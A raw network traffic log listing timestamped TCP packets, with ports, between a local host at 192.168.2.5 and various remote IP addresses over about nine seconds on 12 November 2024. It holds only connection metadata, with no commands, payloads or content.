Nov 12, 2024 00:06:14.763231039 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.770154953 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.770169973 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.770387888 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.771466970 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:14.815330029 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:14.851496935 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.851736069 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.851747036 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.852124929 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.852183104 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.852829933 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.852888107 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.853017092 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.853076935 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.853267908 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.853276014 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:14.853292942 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.896358967 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:14.896377087 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:15.015147924 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:15.015193939 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:15.015256882 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:15.016632080 CET	49730	443	192.168.2.5	184.28.90.27
Nov 12, 2024 00:06:15.016642094 CET	443	49730	184.28.90.27	192.168.2.5
Nov 12, 2024 00:06:15.096898079 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:15.096946955 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:15.098558903 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:15.147027016 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:15.147051096 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:15.160334110 CET	443	49731	142.250.186.110	192.168.2.5
Nov 12, 2024 00:06:15.162223101 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:15.221354008 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:15.226211071 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:15.241014957 CET	49722	443	192.168.2.5	142.250.185.196
Nov 12, 2024 00:06:15.241121054 CET	49731	443	192.168.2.5	142.250.186.110
Nov 12, 2024 00:06:15.930820942 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:15.931210995 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:17.486006021 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:17.486042023 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:17.492136002 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:17.493478060 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:17.493493080 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:18.139050007 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:18.139137030 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:18.729551077 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:18.729583025 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:18.729926109 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:18.824462891 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:19.082117081 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.082134008 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:19.082180977 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.082509041 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.082520962 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:19.819756031 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:19.821914911 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.821924925 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:19.822946072 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:19.823014021 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.828041077 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.828166962 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:19.828334093 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.828340054 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:19.932044983 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:19.985136032 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:20.054264069 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:20.054337978 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:20.410226107 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:20.410265923 CET	443	49739	94.245.104.56	192.168.2.5
Nov 12, 2024 00:06:20.410278082 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:20.410315990 CET	49739	443	192.168.2.5	94.245.104.56
Nov 12, 2024 00:06:20.676441908 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:20.676477909 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:20.676558018 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:20.677120924 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:20.677134991 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.050769091 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:21.054234982 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:21.199736118 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.199821949 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.284683943 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.284723997 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.284996033 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.298971891 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.343334913 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.425522089 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:21.425554991 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:21.425626993 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:21.427335978 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:21.427346945 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:21.465523958 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:21.470334053 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.470356941 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.470381021 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.470441103 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.470469952 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.470520973 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.472198009 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.472217083 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.472274065 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.472280979 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.472325087 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.507335901 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.551690102 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.551724911 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.551760912 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.551789999 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.551808119 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.551852942 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.553245068 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.553266048 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.553308964 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.553316116 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.553348064 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.553368092 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.555542946 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.555572987 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.555625916 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.555632114 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.555670023 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.555691957 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.593816042 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.593839884 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.593895912 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.593919039 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.593944073 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.593966007 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.634277105 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.634314060 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.634360075 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.634387016 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.634402037 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.634449959 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.634617090 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.634634018 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.634674072 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.634685040 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.634696960 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.634722948 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.635273933 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.635291100 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.635340929 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.635349035 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.635375023 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.635396004 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.635572910 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.635591030 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.635623932 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.635632038 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.635658026 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.635672092 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.639806032 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.639822006 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.639878988 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.639887094 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.639940023 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.640419960 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.640434980 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.640497923 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.640505075 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.640543938 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.674762964 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.674798012 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.674860954 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.674884081 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.674926996 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.677921057 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.677947044 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.677953959 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.677973032 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.677985907 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.677992105 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.678004980 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:21.678019047 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.678033113 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:21.678076982 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:21.678760052 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.678766966 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.678819895 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:21.678829908 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.681473017 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:21.681938887 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:21.715298891 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.715382099 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.715387106 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.715425968 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.764508009 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.764543056 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.764558077 CET	49743	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.764564037 CET	443	49743	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.837632895 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.837656975 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.838282108 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.839499950 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.839530945 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.840164900 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.840574026 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.840584993 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.840636015 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.840780020 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.840785027 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.840791941 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.840792894 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.840840101 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.840922117 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.840934038 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.840993881 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.841007948 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.841507912 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.841519117 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.841727972 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.841758013 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:21.842010021 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.842252970 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:21.842267990 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.077011108 CET	49728	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:22.077609062 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:22.081947088 CET	80	49728	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:22.082412958 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:22.082478046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:22.082802057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:22.082854986 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:22.088056087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:22.088073015 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:22.088083029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:22.088119984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:22.175872087 CET	443	49746	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:22.175940037 CET	49746	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:22.353960037 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.354193926 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.356287956 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.356307030 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.356406927 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.356848955 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.356853008 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.357180119 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.357186079 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.357192039 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.357234955 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.357594013 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.357598066 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.357842922 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.357861996 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.358194113 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.358198881 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.358485937 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.358520031 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.358916044 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.358922005 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.359247923 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.359260082 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.359636068 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.359641075 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.448426962 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.448494911 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.448560953 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.449907064 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.449930906 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.449975014 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.449980021 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.450030088 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.450545073 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.450565100 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.450612068 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.450620890 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.450656891 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.450706959 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.450728893 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.450768948 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.450778008 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.450937986 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.450949907 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.450984001 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.451113939 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.456804037 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.456856012 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.456952095 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.458344936 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.458375931 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.458395004 CET	49754	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.458395004 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.458395004 CET	49752	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.458403111 CET	443	49754	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.458409071 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.458415031 CET	443	49752	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.461220026 CET	49753	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.461232901 CET	443	49753	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.462064981 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.462090015 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.462100029 CET	49756	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.462105989 CET	443	49756	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.464137077 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.464143038 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.464154005 CET	49755	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.464159966 CET	443	49755	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.475673914 CET	49732	443	192.168.2.5	20.109.210.53
Nov 12, 2024 00:06:22.475692987 CET	443	49732	20.109.210.53	192.168.2.5
Nov 12, 2024 00:06:22.486968994 CET	49760	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.487030029 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.487149954 CET	49760	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.529432058 CET	49760	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.529480934 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.559739113 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.559808016 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.559878111 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.563447952 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.563515902 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.563669920 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.563745975 CET	49761	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.563761950 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.568378925 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.568394899 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.568502903 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.568833113 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.568842888 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.570064068 CET	49762	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.570092916 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.578155041 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.578231096 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.578286886 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.578811884 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:22.578835011 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:22.646115065 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:22.646123886 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:22.646181107 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:22.646518946 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:22.646531105 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:23.042711020 CET	443	49760	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.078320980 CET	443	49761	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.081469059 CET	443	49762	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.081712008 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.091762066 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.116508961 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.116537094 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.118190050 CET	49764	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.118196964 CET	443	49764	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.118542910 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.118576050 CET	443	49763	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:23.118935108 CET	49763	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:23.118942022 CET	443	49763	13.107.246.45	192.168.2.5
